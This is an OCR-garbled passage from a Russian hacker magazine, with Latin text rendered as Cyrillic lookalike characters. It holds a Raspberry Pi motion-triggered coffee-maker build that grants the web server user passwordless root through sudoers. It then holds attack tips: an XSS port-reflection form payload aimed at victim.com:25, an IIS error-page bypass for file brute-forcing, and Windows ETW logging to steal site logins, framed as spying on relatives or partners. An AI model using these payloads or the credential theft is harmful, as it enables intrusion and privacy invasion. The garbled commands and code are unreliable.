и ЬіІ.Іу/ІІгХРрІ . 



ВЕБ-КАМЕРА И МОТІОИ 



В качестве веб-камеры в моем варианте используется І_оді1есЬ ЕЮ 
ѴѴеЬсат С525. При приобретении новой веб-камеры стоит сверить- 



ся со списком оборудования, совместимого с РРІ ( ЬіІ.Іѵ/ОѵѴѴСШН ), 
некоторым может потребоваться ІІ5В-хаб с дополнительным 
питанием. Кроме того, стоит проверить совместимость с Моііоп ( нЕ 
I у/ 5 М X Ь к Ь ) по ссылкам «ѴѴогкіпд йеѵісез» и «І\Іоп ѴѴогкіпд йеѵісез». 
Если камеры нет в списке «ѴѴогкіпд йеѵісез», это еще не значит, что 
она не заработает, но из второго списка камеру покупать точно не 
стоит. 

$ ІзизЬ 

< . . > 

Виз 001 Оеѵісе 007: ІО 046сІ:0826 І_о§і1іесІі ,, Іпс. 

Проверить камеру можно, попробовав сделать скриншот с 
камеры: 

$ зисіо арі-^еі іпзііаіі иѵссарііиге 
$ иѵссаріиге -580 -В80 -С80 -680 -х800 -у600 

В текущем каталоге должен появиться файл зпардрд (даже 
если были сообщения об ошибках), который можно открыть на РРі 
с помощью Ітаде Ѵіеѵѵег. 

Моііоп — приложение для мониторинга сигнала с камеры, по- 
зволяющее установить, что значительная часть изображения изме- 
нилась (то есть определить движение в кадре), и в этом случае со- 
хранять изображения и запускать внешние программы. Домашняя 
страница проекта: ЬіІ.Іѵ/БМХЬкЬ . 

$ зисіо арі-^еі іпзііаіі тоіііоп 

Чтобы разрешить запуск Моііоп в качестве сервиса, но запре- 
тить автозапуск при загрузке: 

$ зисіо тѵ /еіс/гс2.сІ/5ѲЗто1ііоп /еіс/гс2.сІ/КѲЗто1ііоп 
$ зисіо тѵ /еі:с/гс3.сІ/$ѲЗто1ііоп /еіс/гсЗ.сІ/КѲЗтоІііоп 
$ зисіо тѵ /еі:с/гс4.сІ/5ѲЗто1ііоп /еі:с/гс4.сІ/К03то1ііоп 
$ зисіо тѵ^/е1іс/гс5.сІ/503то1ііоп /е1іс/гс5.сІ/К03то1ііоп 
$ зисіо папо /еіс/сіе-раиііі/тоіііоп 



# зеіі Ііо ’уез' Ііо епаЫе ІіИе тоіііоп сіаетоп 
зіагЬ _то1ііоп_сІаетоп=уе5 

Разрешить доступ к веб-интерфейсу Моііоп с внешних хостов: 
$ зисіо папо /еіс/тоіііоп/тоіііоп . соп-р 



ыеЬсат ІосаІІіозі: о-р-р 
сопіігоі ІосаІІіозі: о-р-р 
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РНКЕАКШ6 



В этом же файле хранятся настройки детектирования движе- 
ния, начала и завершения записи с камеры и запуска внешней 
программы при обнаружении движения. 

$ зибо папо /еіс/тоіііоп/тоіііоп . соп-Р 



# СоттапсІ іо Ье ехесиііесі ыііеп а тоіііоп -Ргате із сіеііесііесі 

# (бе-РаиІІі: попе) 

оп еѵепі: зііапі: зисіо /Ііоте/рі/тоіііоп-беіі 



Модель и ревизия 


Коды 


МобеІ В Реѵізіоп 1.0 

МобеІ В Реѵізіоп 1.0 + ЕСІМ 0001 
(по^изез, 014 гетоѵеб) 

МобеІ В Реѵізіоп 2.0 


2 

3 

4, 5,6 



I ѴАѴѴ.'І 

НурегТехІ СоНее 
Роі Сопігоі Ргоіо- 
соі (НТСРСР/1.0): 

ЬіІ.Іѵ/КаБОсд . 



Коды моделей РазрЬеггу Рі 



/Ьоте/рі/тоііоп-беі — сценарий, который будет выполняться при 
детектировании движения. Ему понадобятся права гооі для управ- 
ления портами. 

Добавить пользователя Моііоп (тоііоп) в список зибоегз: 

- 

дописав следующую строку в конце файла: 
тоіііоп АІ_І_=(АІ_І_) ІМОРАББІлЮ : АН 
Запуск с выводом информации в консоль: 

$ зисіо тоіііоп -п 

Когда Моііоп запущен, настройки можно изменить из браузера 
по адресу: //<газрЬеггурі>:8080. Вместо <газрЬеггурі> нужно под- 
ставить фактический ІР-адрес РРі. Увидеть изображение с камеры 
можно по адресу //<газрЬеппурі>:8081. В Рігеіох обновление 
изображения может происходить некорректно. В СЬготе все ОК. 
Предустановленные на РРі браузеры вообще не могут его ото- 
бразить. 

Для настройки определения движения предусмотрен конфигу- 
рационный режим 

$ зисіо то іііоп -з 

В этом режиме при просмотре изображения с камеры будет 
показано различными цветами непосредственно детектирование 
движения, и можно будет скорректировать параметры детектиро- 
вания на странице настроек. 

Изображения с камеры сохраняются в каталоге Лтр/тоОоп, 
формат отдельных изображений по умолчанию 6Р6, роликов — 
5ѴѴР. Формат можно изменить в конфигурационном файле. А от- 
ключить сохранение файлов можно так: 

ои1іри1і_погта1 о-р-р 
-Р-Ртре§_сар_пем о-Р-Р 




ПОРТЫ 6РІ0 — ОСОБЕННОСТИ И УПРАВЛЕНИЕ 



У РРі есть встроенные порты ввода-вывода. Называются они 
ВРІО, ВепегаІ Ригрозе I п риі/О иі р иі, то есть порты ввода-вывода 
общего назначения. Строго говоря, подключить исполнительное 
устройство можно без особых проблем и к простому ПК, но не 
держать же ПК на кухне? Тем и хороша недорогая и миниатюрная 
РРі — ее спокойно можно разместить рядом с исполнительным 
устройством. 

СРІО-порты работают на уровнях 3,3 В. При этом на плате РРі не 
предусмотрено защиты портов, и случайное замыкание 5 В на них 
может оказаться смертельным. 

Максимальный выходной ток, который может держать от- 
дельно взятый порт, — 16 мА. Это значение задается программно, 
в диапазоне от 2 до 16 мА, после сброса оно составляет 8 мА. 
Однако источник питания 3,3 В спроектирован из расчета, что 
максимальный ток по каждому порту (предполагая, что к ним 
подключена максимальная нагрузка) не превышает 2 мА. То есть 
если ко всем портам подключить нагрузку в 16 мА, ее не вы- 
держит источник 3,3 В. Более подробно о допустимом токе можно 
прочитать здесь: Ьі1.Іѵ/0р4РМк, а пример на С, как им можно 
управлять, — здесь: Ьіі.Іѵ/БіАРдІ . Распайка портов и примеры до- 
ступа к ним из различных языков программирования приведены 
здесь: Ьіі. Іѵ/ЗіА ЭХА . 

Есть две основных версии плат, Реѵізіоп 1 и 2, в них немного 
различается распайка и назначение портов. Чтобы определить, 
какая версия, нужно ввести команду саі /ргос/сриіпіо и найти 
Ьагбѵѵаге геѵізіоп собе в таблице выше. Дополнительная информа- 
ция о различиях Реѵізіоп 1 и 2 есть здесь: Ьіі.Іу/СПЧНКРР . 

Питание +5 В и 3,3 В, земля (6І\Ю) и порт ВРІО 4, который мы 
будем дальше использовать, в обеих версиях размещаются на тех 
же контактах. Разработчики РРі неоднократно отмечают опас- 
ность сжечь порт или всю РРі при неправильном подключении 
порта. Чтобы этого не произошло, порт рекомендуется защитить 
от ошибочных действий. Схемы защиты портов (а кроме того, 
примеры подключения различной периферии) можно посмотреть 
здесь: Ьі1.Іѵ/0АеІ\І0д . 



ДОСТУП К ПОРТАМ 



Самый простой способ управления портом — из командной строки. 
Состояние порта при этом можно проконтролировать вольтметром. 
Все действия делают под рутом. 

$ зибо -і 

Начало работы с портом: 

$ есбо "4" > /зуз/сіазз/^ріо/ехрогіі 

Режим работы — вывод: 

$ есііо "оиіі" > /5Ѵ5/с1а55/%ріо/%ріо4/бігес1ііоп 
Вывод значений: 

$ есііо "I м > /5Ѵ5/с1а55/^ріо/^ріо4/ѵа1ие 



Рис. 3. Принципиальная схема модуля подключения реле 



$ есііо "0" > /зѵз/сІазз/^ріо/^ріоД/ѵаІие 
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Кофе с малиной 




Рис. 4. Первый вариант модуля реле на контактной макетной плате 

Режим работы — ввод: 

$ есИо "іп" >^5у5/с1а55/§ріо/§ріо4/сІігес1:іоп 
Считать значение на входе порта: 

$ саі: /5у5/с1а55/^ріо/^ріо4/ѵа1ие 

Завершить работу с портом: 

$ есбо "4" > /5у5/с1а55/§ріо/ипехрог1: 

Подготовим скрипт для управления заданным портом, который 
будем использовать позже: 

$ 51ІСІ0 папо 5МІ*СІ1_§рІ0 

Текст: 

#! /Ьіп/Ьазіі 
РОКТ_ІМЦМ=$1 

і-р [ $ 2 . ~ ’оп.' ]; 1:Меп 
МЕІлІ_ѴАІ_ІІЕ=1 
еізе 

іб [ $2. == ’о-Р-Р.' іі Тбеп 
ЫЕІлІ_ѴАІ_ІІЕ=0 
еізе 

есбо 'ІІ5а§е : $0 огЦобб' 

ехіІ 
б 
б 



# Настраиваем порт 6РІ0 на вывод 

іб [ ! -е /5Ѵ5/с1а55/^ріо/^ріо$Р0КТ_І\ІІ)М ] 

ббеп есбо $РОКТ_І\ІІІМ > /Буз/сіазв/^ріо/ехрогі: 
б 



# Читаем старое состояние 

0Ю_ѴАШЕ=$(са1: /5у5/с1а5 5/§ріо/§ріо$Р0КТ_МІІМ/ѵа1ие) 
іб [ $ОШ_ѴАШЕ == 1 ]; -Ыіеп 
ОЮ_ѴАИІЕ_ТЕХТ='оп' 
еізе 

ОЮ_\/А1_11Е_ТЕХТ='обб' 

б 



есбо "оиб" > /5у5 /с 1а5 5/§р іо/§ріо $ Р0К Т_І \ІІ)М/сІігес1: іо п 



есбо -пе '5ыібсбіп§ СРЮ '$РОКТ_І\ІіМ бгот '&ОІ.Р ѴАШЕ ТЕХГ \ 
бо '$2'...' 

есИо $МЕ1лІ_ѴАШЕ > /5у5/с1а55/§ріо/§ріо$Р0КТ_І\ІІ)М/ѵа1ие 
есбо ' сіопе.' 

Права на исполнение: 

$ сбтосі +х зыібсб е ріо 

И проверим: 

$ 5ыібсб_§ріо 4 оп 
$ зыібсб_§ріо 4 обб 



МОДУЛЬ РЕЛЕ 



Подключение реле реализовано по схеме из этой статьи: Ьіі.Іѵ/ 
Т5ЛЧЫ- . В нормальном положении, когда на выходе порта СРЮ 
логический ноль и нулевой потенциал, транзистор закрыт и на- 
пряжение на нагрузку не подается. Если на СРЮ подать логиче- 
скую единицу, 3,3 В через резистор откроют транзистор, через 
него потечетток и реле сработает. Диод предназначен для снятия 
отрицательных бросков при отключении реле. 

Задействованы другое реле (по нему чуть позже) и транзистор с 
диодом — те, которые оказались под рукой, близкие по характери- 
стикам. Резистор Р1 (1 кОм), диод типа КД522 (1 N4148), транзистор 
Н547. В статье есть рекомендации, как выбрать аналоги. Дополни- 
тельно стоит проверить выходной ток порта при включенном реле. 

Подключаемая к схеме нагрузка составляет 640 Вт. Это значит, 
что при напряжении в 220 В ток составит 640 Вт/ (220/1,41) В = 4,1 А. 
Еще одно требование к реле — чтобы замыкались и размыкались 
сразу два провода и нагрузка полностью обесточивалась. Один из 
вариантов, подходящий под такие требования, — реле ТРИ-5ѴОС- 
50-2СМ-Р, управляемое от 5 В и способное коммутировать до 8 А 
переменного тока 250 В. 

Начать монтаж можно на контактной макетной плате. Конечно, 
для серьезных задач она не подходит, но такие вот небольшие 
схемы на ней можно быстро собрать и отладить. Сначала запитыва- 
ем от отдельного источника +5 В, все проверяем без подключения 
к РРі, заменив подключение к порту резистором и кнопкой к +5 В, 
промеряем все токи и ставим разъем для подключения к основной 
плате РРі. Подключать 220 В к такой плате категорически нельзя, 
поэтому все равно придется брать паяльник в руки и переносить 
это на печатную плату. 

Для подключения к основной плате РРі можно собрать шлейф из 
пары разъемов и плоского кабеля, подключить к нему промежуточ- 
ную плату, на которой уже разводятся нужные порты и питание на 
шлейфы к периферийным устройствам, пока всего на один, уже не 
26-, а 4-проводной шлейф. Он подключается к монтажной плате, на 
которой собирается в точности то же, что и в первом варианте, добав- 
лением клеммников для 220 В. Клеммники распаиваем на реле про- 
водом сечением 0,75, аккуратно проверяем тестером работоспособ- 
ность схемы, пощелкав реле. Дополнительно можно развести землю. 
Затем подключаем провода к клеммам, также сечением 0,75, на одной 
из которых ставится вилка, на другой — розетка на провод. 

Дальше осторожно и аккуратно: 220 В частотой 50 Гц — на- 
пряжение, при неаккуратной работе с которым последствия могут 
быть намного трагичнее, чем сгоревшая РРі. Визуально проверяем 
пайку на плате реле, проверяем надежность закрепления проводов 
220 В в клеммниках. Фиксируем плату, а лучше устанавливаем ее 
в закрытый корпус, чтобы случайно не задеть открытые контакты 
под напряжением. Не торопимся и последовательно на каждом 
шагу проверяем тестером. Отключаем плату реле от основной 
платы РРі, втыкаем вилку в 220. Дыма нет. Отключаем от сети, под- 
ключаем основную плату РРі, опять включаем в 220. Дыма опять 
нет, РРі жива. Щелкаем реле, видим 220 на розетке. Отключаем 
реле и 220, подключаем к розетке настольную лампу, подаем 220, 
щелкаем реле. Ура! 
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РНКЕАКШ6 



Переводим дух и, установив плату реле в корпус на постоянной 
основе, пробуем уже в окончательном варианте, с кофеваркой в 
качестве нагрузки. 



УПРАВЛЕНИЕ ПОРТАМИ С ПОМОЩЬЮ ѴѴЕВІОРІ 



Самый простой способ достучаться до портов СРЮ через веб — 
установить ѴѴеЫОРі. Это приложение, позволяющее визуально 
задавать направление работы порта (ввод/вывод), видеть его 
состояние при вводе и задавать значение на выводе. Установка 
подробно описана здесь: эіі.Іѵ/ЦУЕгРг . 

$ 5іісІо ар1:-§е1: Іпз1:а11 арасІіе2 рбр5 

Для работы ѴѴеЫОРі использует модуль геѵѵгііе и переопределе- 
ние конфигурации (.Ыассезз): 

$ зисіо а2ептосІ гемгіііе 

$ зисіо папо /е1:с/арасІіе2/5І1:е5-епаЫесІ/00Ѳ-сІе-Раи11; 

В разделе <йігесІогу /ѵаг/ѵѵѵѵѵѵ/> изменить строку 
«АІІоѵѵОѵеггісІе ІМопе» на «АІІоѵѵОѵеггісІе АП»: 

<РігесЕогу /ѵа г/ѵіш/> 

Оріііопз Іпсіехез РоИоыБутИпкз МиІІііѴіеыз 
АІІоыОѵепгісІе А11 
Огсіег а11оы л сІепу 
аііоы -Ргот аіі 
</Рігес1:огу> 

Добавить пользователя АрасЬе (ѵѵѵѵѵѵ-баіа) в список зисіоегз: 

$ зисіо ѵізисіо 

дописав следующую строку в конце файла: 
ммм-сіаіа АИ=(АИ) ІМОРА55ЫР : АН 
Рестартовать АрасЬе: 

$ зисіо /е1:с/іпі1:.сІ/арасІіе2 гезіагЕ 
Загрузка и разархивация ѴѴеЫОРі: 

$ м§е1: //ыеЬіорі.§оо§1есосІе. сот/бІез/ІлІеЫОРі-0. 3.1:аг.§2 
$ 1=ап хѵі- р 1лІеЫ0Р і-Ѳ.3.1=ап.§2 

Переместить файлы в соответствующий каталог: 

$ зисіо тѵ ыеЬіорі /ѵап/ыыы 

Основной интерфейс доступен по адресу: //ІосаІЬозі/ѵѵеЬіорі. 

Если открывать страницу непосредственно с РРі, то нужно это 
делать в СЬготіит или Місіогі, ни в ІМеіЗигб ни в йіііо она не рабо- 
тает из-за отсутствия в них поддержки ЭаѵаЗсгірІ. 



СВЯЗЫВАЕМ ВСЕ ВМЕСТЕ 



Для управления портом из браузера через веб вполне достаточно 
веб-интерфейса ѴѴеЫОРі, при желании его можно настроить под свои 
нужды. Для включения реле при детектировании движения добавим 
старт Моііоп в заданное время утром, например в 8:00, в/еІс/сгоЫаЬ: 

0 8 * * * есбо $(сІа1:е)': '$(зегѵісе тоіііоп зііагі:) >> У_ 

/ѵаг/1о§/то1:іоп_5І:ап1: . 1о§ 

Заставим Стоп перечитать его: 

сгогѵЬаЬ /е1:с/сгоп1:аЬ 




Рис. 5. Второй вариант модуля реле, распаянный на печатной макетной плате 
с промежуточной коммутационной платой 

Создадим скрипт, который будет запускаться из Моііоп: 

$ папо /Ііоте/рі/то1:іоп_сІе1: 

Текст: 

#! /Ьіп/Ьазіі 



/Ііоте/рі/5ыі1:сІі_§ріо 4 оп 
зепѵісе то~Еіоп зііор 
з іее р 1800 

/Ііоте/рі/зіл/ііісіі _^ріо 4 оТТ 

Права на исполнение: 

сбтосі +х /Ііоте/рі/тоіііоп сіеі: 

Теперь в восемьутра будетзапущен Моііоп, который начнет детек- 
тировать движение. Когда движение будет обнаружено, запустится 
скрипт тоІіоп_сІеС который выдаст логическую единицу на порт 
СРІО 4, подав напряжение на реле и включив кофеварку, остано- 
вит Моііоп, подождетЗО минут и выдаст на тотже порт логический 
ноль, отключив нагрузку. 



ЗАКЛЮЧЕНИЕ 



Большая часть компонентов приобретена в «Чип и дип» (включая 
корпуса, кабельные вводы, платы, переходник и так далее). Это 
магазин с хорошим выбором, в который можно зайти, посмотреть 
и потрогать, но недешевый, есть ощутимо бюджетнее. Те, кто 
не хочет долго ждать доставки РРі, уже могут ее приобрести, на- 
пример в «Терраэлектронике», хотя и совсем не за 25 долларов. 

Чтобы не помешала темнота зимними утрами, вместо камеры 
(или в дополнение к ней) можно подключить ИК датчик движения. 
Можно разобраться в кофеварке эспрессо с автоматическим при- 
готовлением и не задумываться вечером о том, что нужно засыпать 
кофе на следующее утро. Можно подключить реле через 2удВее, 
добавить других исполнительных устройств, например светильник 
в спальне. Можно реализовать управление через 5М5, подключив 
30-модем, либо с обычного телефона через йТМР, подняв Азіегізк 
или РгеезѵѵіІсЬ. А можно написать приложение для Андроида 
и іРИопе/іРасІ. 

Вариантов очень много, и с появлением РРі возможности экспе- 
риментировать на границе между программированием и физиче- 
ским миром резко расширились. И-И 
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166 рублей 
за номер! 



Нас часто спрашивают: «В чем преимущество подписки?» 

Во-первых, это выгодно. Потерявшие совесть распространители не 
стесняются продаватьжурнал за 300 рублей и выше. Во-вторых, это 
удобно. Не надо искатьжурнал в продаже и бояться проморгать момент, 
когда весьтиражуже разберут. В-третьих, это шанс выиграть одну из 20 
лицензий на новую версию КІ5! 




ПОДПИСКА 

6 месяцев 1110 р. 
12 месяцев 1999 р. 




І 



ПОДАРОК 



В обновленном КазрегБкуІпІегпеІ 
Бесигііу применены несколько совер- 
шенно новыхтехнологий для борьбы 
сраспространеннымиисложными 
угрозами, нацеленными на личные дан- 
ные и банковские счета пользователя. 
Важнейшие из них — уникальныетех- 
нологии «Автоматическая защита от- 
эксплойтов» и «Безопасные платежи». 

Первые 20 читателей, оформившие 
годовую подпискув периодс26октября- 
по 10 ноября, получатв подарокгодовую 
лицензию на КІ5 на два компьютера. 
Получить приз можно будет по электрон- 
ной почте. Оформитьподпискуможно 
за пару минут на сайте ЬНрѴ/зІіор.дІс.ги. 



ЬКрУ/зЬор.дІс.ги 



Ѵ/5А €& & 4 О 



8 (800) 200-3-999 (бесплатно) 

зиЬзсгіЬеОдІс.ги 




ВЗЛОМ/ ЕА5ѴНАСК 



Алексей «бгеепйод» Тюрин, ОідііаІ Бесигііу (іѵѵіНег.сот/апІуигіп) 





ѴѴАКМШ6 



Вся информация 
предоставлена 
исключительно 
в ознакомительных 
целях. 

Ни редакция, 
ни автор не несут 
ответственности 
за любой возможный 
вред, причиненный 
материалами данной 
статьи. 



ПОЛУЧИТЬ Х55 НА САЙТЕ ЧЕРЕЗ СТОРОННИЙ СЕРВИС 



ЗАДАЧА 



РЕШЕНИЕ 

Давайте представим, что у нас есть некое веб-приложение. Его 
кодили правильные кодеры и не допустили ошибок, которые 
дали бы нам возможность заэксплуатировать какую-нибудь 
уязвимость и получить Х55... На самом деле таких приложений 
масса — тот же ѴѴогсІРгезз например. Без плагинов лишних и/ 
или без глубоких копаний по исходничкам здесь можно только 
руками развести. 

Конечно, есть еще важная вещь — внедрение приложения, 
настройка его. Реально, куча багов из практики рождались 
именно из-за некорректностей внедрения. Ну а если и здесь все 
ОК? Тяжко. Но и тут у нас есть пара козырей в рукаве. Особенно 
если покопаться в стандартах и подключить воображение. 

Михал Залевский (МісЬаІ 2а Іеѵѵзкі) в своей книге ТЬе Тапдіеб 
ѴѴеЬ: А биібе Іо Бесигіпд Мобегп ѴѴеЬ написал об интересном 
трюке. По правде сказать, такая идея посещала не его одного. 
Например, Владимир Воронцов на 2егоЫідЫ:5 201 1 еще до вы- 
хода книги поведал о том же. За что ему спасибо :). 

Суть же трюка заключается в том, что некоторые сервисы 
возвращают приходящие к ним данные. То есть то, что пришло 
на какой-то порт, по разным причинам возвращается обратно. 

И мы этим можем воспользоваться для проведения Х55-атаки. 

С примером будет понятнее. Возьмем Е5МТР. Когда проис- 
ходит подключение к этому серверу, он ждет входящей команды 
от пользователя (см. прошлый номер ][). А при вводе некоррект- 
ной команды сервер возвращает ошибку в стиле «СоппппапсІ 
ипгесодпігесі: "имя введенной команды"». И вот последнее, 
то есть возврат отправленной команды, — самый важный 
момент. А что произойдет, если мы попытаемся подключиться 
с помощью браузера на данный порт, на порт с Е5МТР? Браузер, 



понятное дело, отправит свой запрос и пучок приложенных 
к нему заголовков. А Е5МТР в свою очередь воспримет эти 
данные как поток команд. Но так как введенные команды не су- 
ществуют, он по каждой будет выводить сообщения об ошибке. 
Опять-таки браузер будет получать эти сообщения, как будто 
он работает с веб-сервером, и обрабатывать их соответствую- 
ще. Думаю, теперь все стало вполне ясно. Если мы заставим 
браузер пользователя отправить на такой сервис специально 
сформированный НТТР-запрос, то сервис его отзеркалит, а веб- 
браузер выполнит (так как воспримет ответ от сервиса как ответ 
от веб-сервера). Специально сформированный запрос должен 
представлять собой строку типа «<5сгір1:>аІег1;( , х55 , );</5сгір1:>». 

И опа — мы имеем Х55. Все достаточно просто :). 




Сервис возвращает переданные ему команды — первый шаг к Х55 
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Хакерские секреты простых вещей 



Но только с точки зрения теории. На практике есть несколь- 
ко крупных проблем. Во-первых, как понятно, для эксплуатации 
Х55 нам потребуется, чтобы на том же домене с сайтом был 
сервер, который бы возвращал отправляемые ему значения. 

К сожалению, серверов таких немного. Но встречаются, и это не 
стоит забывать. Во-вторых, когда веб-браузер получает ответ 
от сервера, он фактически не может правильно его разобрать, 
потому что у ответа не будет типичной для веб-сервера группы 
заголовков. Точнее, поведение будет сильно зависеть от версии 
браузера. СЬготе скачает ответ как файлик, Рігеіюх выведет от- 
вет как текст (то есть не воспринимая НТМІ_-тегов), а ІЕ выведет 
ответ как НТМІ_ (обрабатывая все теги). Таким образом, основ- 
ная цель — ІЕ. Но описанное поведение — результат обработки 
простейших запросов. А так как мы можем контролировать то, 
что нам отразится, стоит обратить внимание, что поведение 
браузеров при некорректных ответах более глубокое и широ- 
кое, и при некоторых махинациях мы можем заставить и другие 
браузеры обрабатывать входящий поток данных как НТМ1_. 

Но это тема отдельной задачи, по которой выпущено несколько 
достаточно больших докладов (постараюсь раскрыть в следую- 
щем номере). 

В качестве же третьего ограничения нужно отметить, что 
во многих современных браузерах введено ограничение на то, 
к какому порту можно обратиться (поэтому, к сожалению, стан- 
дартный 5МТР-порт 25 трудно эксплуатировать). 

Но, несмотря на все эти ограничения, стоит помнить о данной 
атаке — это может оказаться самым прямым путем для компро- 



метации клиента. К тому же она проста и показательна с точки 
зрения нестандартности решения. 

Но хватит теории. Опишу еще одну практическую тонкость. 
Как мы можем подкинуть свой 35 в ответ? Ведь есть проблема. 
Данные, которые мы передаем в запросах из браузера, должны 
быть ІІРІ_-енкодены. То есть < и > отправятся на сервер в виде 
«%3с» и «%3е». А это не годится. Чтобы этого избежать, сделаем 
формочку с указанием типа «рІаіпДехІ» или «тиШрагіЛогт- 
баіа». 

< И1:т1 > 

<ИеасІ > 

<те1:а бТТр-еяиіѵ^'СопТепІі-Туре" соігЕегѵЕ="'Еех'Е/ІтЕт1 ; \ 
сІіаг5е1:=и1:-Р-8 ,, > 

<~ЕгЕ1е>Рог1: геЯесЕіоп Х55 1:гіск</1:і1:1е> 

</беасІ> 

<ЬосІѵ> 

<-Рогт ас1:іоп= ,, б1:1:р://ѵіс1:от. сот: 25/" 

епс1:уре= ,, ти11:іраг1:/■Ро^т-сIа1:а ,, те1:босІ= ,, ро5І: ,, > 

<Р> 

<іпри1: пате="х55" ѵа1ие="<5сгір1:>а1ег1:(1) ;</5сгір1:>"> 
</іпри1:> 

</р> 

</Топт> 

<5сгір1:>сІоситеп-1:.Тогт5[0] . 5иЬтіТ( ) ;</5спірТ> 

</ЬосІу> 

</Іі1:т1> 



ОРГАНИЗОВАТЬ ПЕРЕБОР ФАЙЛОВ 
НА ВЕБ-СЕРВЕРЕ 11$ 



ЗАДАЧА 



РЕШЕНИЕ 

Как я уже писал, одно из первых пентестерских дел при анализе 
какого-либо сайта — получить список файликов и/или дирек- 
торий. Кроме того, чтобы поползать ручками по сайту и/или за- 
пустить какой-нибудь зрісіег, который сделает это за нас, также, 
конечно, стоит и поперебирать имена дефолтных и типичных 
файлов/папок. Классический инструмент для данных дел — 
ОігВизІег. И вроде бы все ОК. Да вот с 118 и .І\ІЕТ систематически 
возникают различные трудности, в том числе с перебором. 

Достаточно часто веб-приложение настроено так, что при 
генерации какой-либо ошибки приложением нас редиректит 
на страницу с ошибкой. Причем вне зависимости от причины 
ошибки нам отображается одна-единственная страница. В такой 
ситуации организовать адекватный перебор не представляет- 
ся особо возможным. И в случае ошибки 500, например из-за 
вызова куска приложения, не работающего до аутентификации, 
и в случае 404 — когда запрашиваемого файла не существует, 
и в 403 — когда запрещен листинг директорий, и в других случаях 
мы увидим единую страницу. Но это совсем не хорошо. 

Так вот, Соруш Далили (ЗогоизИ Оаіііі) недавно опубликовал 
интересную штуку (правда, о ней опять-таки многие догадыва- 
лись — такова уж наша сфера), позволяющую увидеть реальную 
причину ошибки. 

Суть способа вполне проста — требуется всего лишь добавить 
в конец запрашиваемого ІІРІ_'а строчку «?а5рхеггограіЬ=/». 

После чего сработает некая магия, редиректа на дефолтную 
страничку ошибки не произойдет, а отобразится «натуральная» 
ошибка. 

Если честно, причин такого поведения автор особо не объ- 
ясняет (вероятно, логика где-то не срабатывает, из-за присут- 
ствия в запросе азрхеггограіЬ, которое оно же и пытается само 



добавить), хотя для наших целей это и не так важно. Но если тебе 
интересно, прошу — доо.д І/ахКЗЬ . Там же, кстати, можно увидеть, 
как защититься от этого трюка. 

Приятно и то, что автор предоставил свой сервер для опро- 
бования этого дела, а потому мне не пришлось ползать по Сети, 
подыскивая подобную ситуацию :). На скринах ты увидишь ре- 
зультаты в действии. 

Таким образом, для того чтобы перебрать файлики 
ОігВизІег'ом, воспользуйся возможностью формировать правила: 
вместо «Біапсіагі 5іагІ Роіпі» используй «ІІРІ_ Р 1122 » и добавляй 
пресловутый «?а5рхеггограіЬ=/». 




Первый существует, но возвращает ошибку 500. Второй — не существует. Но итог один: 
не поперебирать 
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ВЗЛОМ/ ЕА5ѴНАСК 



УЛУЧШИТЬ РАБОТУ С ОШТОВб 



ЗАДАЧА 



РЕШЕНИЕ 

Да, давно я не касался всякой бинарщины. Все веб да веб. Этот 
выпуск, по сути, тоже пропитан вебом. Но в будущем я постараюсь 
исправить сие недоразумение и уравновесить ситуацию. 

Начнем. У всеми любимого дебаггера ОІІуйбд (он же теперь Іт- 
типііуйбд] есть прекрасная возможность расширить функционал, 
во-первых, за счет плагинов, во-вторых, за счет Руібоп-скриптоков 
(только для второго]. И вот не так давно появился еще один 
интересный плагин — 6И:.іѵ/іѵР4Вѵ . 

Блог на испанском, а потому позволю себе перевести какие- 
то его части и общий смысл. Автор плагина, Марио Вилас (Магіо 
Ѵііаз], очень расстраивался оттого, что хелп по ѴѴіпАРІ-функциям, 
встроенный в ОІІуйбд, был основан на стандартном файлике 
ОС — ѵѵіп32.Ыр. Этот файлик является собственностью МісгозоН: 

(а потому не входит «в поставку» с ОІІуйбд] и обновлялся ею. И 
здесь самое главное — прошедшее время. Описание некоторых 
функций современных ОС в нем отсутствует, так как МісгозоН: 
с некоторых пор отказалась от поддержки этого файла и все 
переехало на М50ІЧ. 

Проблема ясна. Но и решение вполне логичное. Марио создал 
плагин, заменяющий использование ѴѴіп32.бІр в ОІІуОбд/ІттипНу- 
йбд. Вместо этого при запросе хелпа (<с1хІ + Р1> или правый клик — ► 
беір оп зутбоііс пате] по какой-либо функции генерится запрос 
в Гугл через дефолтный браузер. В итоге мы попадем на М50ІЧ 
с искомым описанием. 




Запросхелпа = запросв Гугл 

Получается вполне приятная в использовании штука. Для 
запуска плагина надо сделать следующее: 

1. Разархивируем и кидаем плагин в папку плагинов ОІІуйбд. 

2. Открываем ОІІуйбд — > меню Неір — >БеІес1;Арі беІрПІе. 

3. Выбираем ѵѵіп32.бІр (он можетбыть пустым). 

4. Радуемся! 

Кроме того, доступны и исходники, которые позволят подкрутить 
что-то лично под себя. 



ПОЛУЧИТЬ ЛОГИН И ПАРОЛЬ ОТ САЙТА 



ЗАДАЧА 



РЕШЕНИЕ 

Есть такая классическая проблема у многих — заполучить ло- 
гин и пароль от чьего-нибудь, например, вконтактика. Причем 
очень часто жертвой являются их же домочадцы или вторые 
половинки. Ужас, в общем. Или на работе админ захотел узнать 
чьи-то аутентификационные данные от левого сайта. 

Конечно, когда у нас есть полный, админский доступ к 
компу — можно наделать все что угодно. Например, установить 
страшных троянов или кейлоггеров и контролировать таким 
образом все и вся. Но возможно, тогда придется столкнуться с 
антивирусом или в исключительном случае — с правоохрани- 
тельными органами... 

Недавно на РаиІОоіСот.сот было рассказано про небольшой 
трик, с помощью которого хакер мог бы получить аутентифика- 
ционные данные, то есть логин и пароль, от любого сайта, даже 
от такого, к которому доступ происходит полностью по НТТР5. 

И при этом используются только встроенные возможности ОС 
ѴѴіпсІоѵѵз. Звучит достаточно привлекательно :). 

В чем же фишка? Есть такая штука в винде, как Еѵепі Тгасіпд 
Іюг ѴѴі псіоѵѵз (ЕТѴѴ). Думаю, смысл и цель ее понятны из назва- 
ния :). Так вот, ее можно использовать не только по назначению, 
то есть не для каких-то отладочных целей, но и для того, чтобы 
похитить что-нибудь интересное. Одно из главных для нашей 
цели свойств — ЕТѴѴ может л о тировать все обращения в систе- 
ме к ѴѴіпІпеІ АРІ. То есть еще до того, как данные фактически 
попадут в шифрованный НТТР5. 

Таким образом, включив в ОС ЕТѴѴ, мы увидим все отправ- 
ленные и принятые запросы, использованные и установленные 
куки и много другой информации. 




ѴѴіпсіоѵѵб следит за тобой... 

С практической точки зрения требуется выполнить следую- 
щие шаги: 

1. Запуск логирования: 

1о%тап 5іагЕ Соокіе51:еа1ег -р \ 
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Хакерские секреты простых вещей 



